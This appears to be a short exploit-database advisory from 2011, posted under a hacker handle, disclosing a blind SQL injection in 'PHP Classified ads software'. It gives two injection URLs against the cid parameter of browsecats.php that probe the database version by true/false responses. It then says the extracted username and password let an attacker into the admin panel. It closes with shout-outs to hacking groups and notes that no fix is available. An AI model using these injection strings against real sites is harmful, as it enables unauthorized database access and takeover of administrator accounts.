PHP Classified ads software (cid) Blind SQL Injection Vulnerability

2011-01-28 10:15:16

[-]Author: BorN To K!LL - h4ck3r
[-]Contact: [email protected]
[-]Script: PHP Classified ads software
[-]Version: n/a

[path]/browsecats.php?cid=2 and substring(version(),1,1)=4 // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5 // true ,,

after getting the username and the password you can login to admin panel
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"


No fixes

Per poter inviare un fix è necessario essere utenti registrati.